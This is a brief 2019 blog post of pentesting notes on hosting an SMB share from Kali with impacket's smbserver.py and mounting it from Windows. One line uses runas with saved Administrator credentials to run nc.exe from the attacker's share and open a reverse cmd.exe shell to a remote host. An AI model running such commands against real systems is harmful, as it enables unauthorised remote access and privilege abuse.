Saturday 3 August 2019

Remote Shares



File Sharing Server on Kali 

Download SMBServer.py from following link,

https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py

Starting SMB Server

python smbserver.py MYSHARE /root/files/


This will be helpful in scenarios where you need to transfer files from on target system from your SMB shares.



Execute files directly from remote SMB shares 

runas /savecred /user:access\Administrator "c:\windows\system32\cmd.exe /c \\10.10.14.8\MYSHARE\nc.exe -nv <IP Address> <Port>  -e cmd.exe"


Mount remote shares via command line 

net use e: \\IP Address\MYSHARE